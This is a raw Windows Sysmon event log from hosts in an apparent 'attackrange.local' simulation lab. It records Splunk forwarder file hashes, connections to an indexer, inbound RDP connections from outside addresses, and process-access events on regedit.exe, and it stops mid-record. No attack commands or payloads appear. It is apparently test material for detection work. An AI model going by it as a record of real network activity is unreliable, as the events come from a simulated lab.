Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C622ADC2B03D62812E70646F79611E,SHA256=967229DBA4268A322A0BCDD0AF0C016388ED26FCB90A566092413E8080548A73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:04.566{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=CF15E12E672E22010F065225E0F96E03,SHA256=47008AA554A786712C961FDA2B1A8FF3E61755399D136CECDF0BC5099D00F9D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:04.566{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=8C1A12259802BE593599BF68D636D1B0,SHA256=889AAE857757E418B99674A3016F87FB8B3E3BEE12AAFAFBF816140F339095A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:04.363{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B48130A196D29C67604CCD70AC18487,SHA256=04C9AFB23C2C8D660D4257353703B1C536E0CEDBD40C22CE493F63BA18B2F300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981115Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:04.229{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A19DD46A189A1734DA1D1A926BB2F2FF,SHA256=D074A8DBE001764D0ADEFA77D424891401605D1A014B899313549109C55D9A88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:05.379{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF9EBB3EDB68362ACA66DA859E2A4E0E,SHA256=58F13500A2447D28E40DA925E1609467D81E766AC911EDBDBE51A0F536395D67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981116Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:05.245{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65B5FC3C3BB4FEC1D34D3E9D0934F416,SHA256=EF4C7E0FA751D2E42CB772A38E88B0642A2E68981D552B9883A9BC65715A4612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981120Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:06.979{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E9A2E9D5D82A98337B3EEB7B60C7B8,SHA256=886CE6D0836938C62FA45B11E71D0F274EAB179F14A5A51304CCBE8A7AA347DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981119Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:06.979{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE343A5F095F639204E90E61623C0AF8,SHA256=B81A3FAFB152B0B1DCDD3C5BDD253714D730A963B39937D1EE8CC592FF2AA713,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981118Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:06.401{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E25DC4E54BE2A9221390BCA39F620313,SHA256=4466EE182E18BAC8C8FB69C1BD2F04DEE035AF3B2489042688D49E83FC1C7AD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:04.192{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54229-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:06.379{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66B77CB0FE9C699566807B9AB5E774CB,SHA256=7BAAF2AD2B17A40F9BCDA851FB9554ECDA1F93BF8A661845EB43009076A3E53A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981117Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:03.648{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59531-false10.0.1.12-8000- 23542300x8000000000000000981122Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:07.479{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA5CB7DAF446F1A60055F2A1773FD6E2,SHA256=B06F5A05EA268190BB63800147D283189E807E094052CF0AE62F876BFB3B9D02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:07.379{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AFF52DB8FA50F8EC18497A3842E74A,SHA256=AC9DE4E98274928DD85325FDF6544A56011288552606089A23E48F32E5D86A79,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981121Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:04.193{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63520-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981123Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:08.495{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08CF26C3B5C5A46323D36E8297704346,SHA256=F324C96C0E4D074B9A328174A033CD8D0581036AA683D42B0AC5CDEC21B11052,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:06.614{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64390-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:08.379{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD575E5288B8E1FD7FE962A8ADF77D1E,SHA256=29435616807641A8C2B998C4BD1DBFC3455FD8A2A82982992AAA2EE616AF4342,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:08.035{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=19AEFC71ABDD8D4AA889264536B796CB,SHA256=04430A04B2834407221BD828313906F1D65A7496C35183F1A591A7B14A925BB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:08.035{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71DAC97AB748819D71DB0B2DB0E046C8,SHA256=5BAD4351893E6179AC954D222B82CD6A50CA4C3061B85F773C0A2331BB835D02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:09.379{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8E8653D4341CC69D8A8F8EE9FD5A1C9,SHA256=D3A028DD2A893013DBD43043F5A411FDF6040C89F779FB23CD37534DA3E7CC4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981127Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:09.495{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7909E13F6E786F3022EF231DB0454659,SHA256=A14562C6E7B7312C2F0B09497A1671946ADF87A8C5529816EF43C0A949BCD33F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981126Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:06.725{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-65269-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981125Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:06.680{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64443-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981124Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:09.401{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E9A2E9D5D82A98337B3EEB7B60C7B8,SHA256=886CE6D0836938C62FA45B11E71D0F274EAB179F14A5A51304CCBE8A7AA347DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981128Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:10.510{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6646BEE0C4FA3D3350E4F70137EC3FE,SHA256=E9E7E02DCF332B4222F175EE810E0DC02B5C472675EDC2A394723572702DE734,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:10.380{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BCD7299E77108313E6F2D86160266BD,SHA256=9DE4EA88DA6BD054CF337BE585A7DBF6F113D6AA4A7B0DCFCCBD5CB92E107475,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981129Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:11.526{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E48DFD45D56195C8E253A9EE6885906C,SHA256=75DCD90E0879D17784A1B7EDF7C3128D73FFE01828B8BAC8AC3666728C593F3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:10.052{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54230-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001056565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:09.616{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse39.101.135.90-56901-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:11.395{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37F412AFA92F9809EAA1D3428FC600D,SHA256=95A9BF946E553B431393197D07963D7BF9E7A1A53C364B7196A04A0798E62E41,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:11.145{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981131Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:12.745{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3CF891297757F117B3F18C29081D757,SHA256=4CAA098C3E0FDC32E7644D7854BBE2394CFC0788FAC92C26FBFA9818B680C28D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:12.864{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 